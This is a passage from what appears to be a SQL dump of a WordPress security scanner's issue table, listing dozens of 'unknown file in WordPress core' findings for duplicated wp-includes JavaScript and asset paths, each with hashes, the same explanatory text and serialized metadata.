More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/vendor/lodash.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34197,1631564696,1631564696,'new','knownfile',75,'3437a64dcdf88439b21296ff019111da','6bc072562cf150eda67392d612f84985','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/lodash.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/dist/vendor/lodash.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34198,1631564696,1631564696,'new','knownfile',75,'20487756a201d5438a330743f826e279','d0e0f19b845a624aaaeecc424e2d07c7','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/moment.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/vendor/moment.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34199,1631564696,1631564696,'new','knownfile',75,'ae0b66eceda86ae1c4f123515be60eba','dd818dc1dc7c833ccbb6e1e582e2bbc8','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/moment.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/dist/vendor/moment.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34200,1631564696,1631564696,'new','knownfile',75,'c795c83d80c02209538c17cf6e4efdbe','ab3d66996cd5cc09f6eff2f1a7ade0ce','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/react-dom.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/dist/vendor/react-dom.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34201,1631564696,1631564696,'new','knownfile',75,'e1ec2c4fd9880a75b8ae1a47d14f2a53','18acaf138e7ae72aa21f33d1770e5a90','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/react-dom.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/dist/vendor/react-dom.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34202,1631564696,1631564696,'new','knownfile',75,'7c122a3127454d01bd43fc8fcacbf196','1eb163254fea1bdf3d10a603ce9a4455','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/react.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/dist/vendor/react.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34203,1631564696,1631564696,'new','knownfile',75,'c01701771d708a6b2a0e4e3d2221a607','79fa60886102f4766808b7cbb1110fba','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/react.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/dist/vendor/react.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34204,1631564696,1631564696,'new','knownfile',75,'439bfe2fb3fb4ce703d0a75cfa3ab009','15574dbe9793d52999a0f065d019e9ed','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34205,1631564696,1631564696,'new','knownfile',75,'240361aba8d785cd2e733ebee7b86365','6e8588f4c41ef449694fd3ef9c1ab6c1','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34206,1631564696,1631564696,'new','knownfile',75,'e86331218f2e0eb0c27dd754115fcef1','572d1a88d99f8d05509eee76464f884a','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-element-closest.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-element-closest.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34207,1631564696,1631564696,'new','knownfile',75,'0b9734b7020af6b7c5c37495a819af31','326013c86c26dd51959fa4c9b562cd39','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34208,1631564696,1631564696,'new','knownfile',75,'19af301438bf8181e415b5be5b47ce6c','b313735d26273b4ac939f613228a9f2d','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-fetch.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-fetch.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34209,1631564696,1631564696,'new','knownfile',75,'aa0cc99e4a32712121847d87984b9c7d','207db7f8eae034768d6d2a3332812fbb','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34210,1631564696,1631564696,'new','knownfile',75,'0c6d3252b50468cf84fe71a8817d0f0b','98737686196abea510bc9009f4ebae36','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-formdata.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-formdata.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34211,1631564696,1631564696,'new','knownfile',75,'accf5244b2e052d324c30ad1bea4cc2c','827c92d74a8b0bb3b953501bcc8ba7ad','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34212,1631564696,1631564696,'new','knownfile',75,'6eb4d8c8470471d85571ac91b2db6f41','919ec8df1d6b3cf7931a2be8046430c9','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-node-contains.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-node-contains.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34213,1631564696,1631564696,'new','knownfile',75,'6295ed7580917ea55b0214d2c0a6ae12','fa77a18e54156e02c3a3709c84ba1fc6','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34214,1631564696,1631564696,'new','knownfile',75,'35bfcdde5939c84bb93dabcdad6db9eb','956883e22228063c39401d2cc3cd4271','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-object-fit.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-object-fit.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34215,1631564696,1631564696,'new','knownfile',75,'ade3782b301d1afc846b3f7fccdd3606','c5d09f367994dacd70d4d881dd525620','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-object-fit.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:68:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-object-fit.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34216,1631564696,1631564696,'new','knownfile',75,'b72362e357ba1651749bc6ce8fd2c058','a11c30a72122275b47f79c376155be38','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-url.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-url.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34217,1631564696,1631564696,'new','knownfile',75,'ca712d9510130e882387d41e0b09bfad','a5e17532337c547761711eada9cb364a','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-url.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-url.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34218,1631564697,1631564697,'new','knownfile',75,'d00d1ce8864caa5e6a477a3463c69bc2','df9dca1fc8997f7e4eb8779f5ca64e97','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34219,1631564697,1631564697,'new','knownfile',75,'5d7abc3732f18df376490235f7b4d059','c4d38a7a379b0a60c23dd7ac96e62348','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34220,1631564697,1631564697,'new','knownfile',75,'fd776ab0277832588d5c82800369100b','aeae7150fe190f47d9da4b7a42a300b6','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/viewport.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/dist/viewport.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34221,1631564697,1631564697,'new','knownfile',75,'b015cb1b89bbe3ad5f3c68a03e3ef09c','bf580d5c1ea3488f298fa90c3d92778d','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/viewport.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/dist/viewport.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34222,1631564697,1631564697,'new','knownfile',75,'d4cc8aafb4972ea1ba29b3b962a84147','b90598f217b4bc258f35aec7118ed8d7','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/warning.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/dist/warning.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34223,1631564697,1631564697,'new','knownfile',75,'8c6ea8756002cf7013f68107eec29fd2','2d38a4f446ee761da3509cfddb14e2f2','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/warning.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/dist/warning.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34224,1631564697,1631564697,'new','knownfile',75,'556b3e7d00721eb84925ca79756efa27','d9e0505812758790f8447afadf539d7f','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/wordcount.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/wordcount.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34225,1631564697,1631564697,'new','knownfile',75,'718aed7c91d6af633cf1046407388fbf','752958ed169a6574bb0c17ce305733bf','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/wordcount.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/wordcount.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34226,1631564697,1631564697,'new','knownfile',75,'10b33da81b6161c9cfd18d7f49c6d2f1','cc886e95221e5739bbac59f6fbfb35ae','Unknown file in WordPress core: wp-includes/wp-includes/js/heartbeat.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/heartbeat.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34227,1631564697,1631564697,'new','knownfile',75,'3142ca578e37db5aa497dc02d12d0f20','404d27b2326821f662c8439307787061','Unknown file in WordPress core: wp-includes/wp-includes/js/heartbeat.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/heartbeat.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34228,1631564697,1631564697,'new','knownfile',75,'882e13372a2fec5cd82d74b1b0c80f51','cf9ff405a30aaf71df57af537930f470','Unknown file in WordPress core: wp-includes/wp-includes/js/hoverIntent.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/hoverIntent.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34229,1631564697,1631564697,'new','knownfile',75,'a9ed7c2f2e6780cd62d973f8a63dabfe','4360db953d64afb25fa92ad85377d058','Unknown file in WordPress core: wp-includes/wp-includes/js/hoverIntent.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/hoverIntent.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34230,1631564697,1631564697,'new','knownfile',75,'ed8d97f1bc587718587ac3791a03379e','0501082d298e4392cd5bc5b6c32ea448','Unknown file in WordPress core: wp-includes/wp-includes/js/hoverintent-js.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/hoverintent-js.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34231,1631564697,1631564697,'new','knownfile',75,'df499be546f660735ec872717dd3e17a','ae5e86fe31065d85d1fcf809e228c900','Unknown file in WordPress core: wp-includes/wp-includes/js/imagesloaded.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/imagesloaded.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34232,1631564697,1631564697,'new','knownfile',75,'494db04a1a9fca113a5efd80afb71bae','61bad81d5a0623c8747d7773e3982a6d','Unknown file in WordPress core: wp-includes/wp-includes/js/imgareaselect/border-anim-h.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/imgareaselect/border-anim-h.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34233,1631564697,1631564697,'new','knownfile',75,'9e40fc0462988db8e12d9449a923d504','e728b3d05eb8b39a996d99739330c4f2','Unknown file in WordPress core: wp-includes/wp-includes/js/imgareaselect/border-anim-v.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/imgareaselect/border-anim-v.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34234,1631564697,1631564697,'new','knownfile',75,'8e4c5ca030e7f91ad6578d51f7e6eee4','f1741edb21b8385cfe12dfab6abf8d86','Unknown file in WordPress core: wp-includes/wp-includes/js/imgareaselect/imgareaselect.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/imgareaselect/imgareaselect.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34235,1631564697,1631564697,'new','knownfile',75,'3ead021a7a654c5ce41ce6927280ef42','d433107c926764f4ea1ca789e0aaeec6','Unknown file in WordPress core: wp-includes/wp-includes/js/imgareaselect/jquery.imgareaselect.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 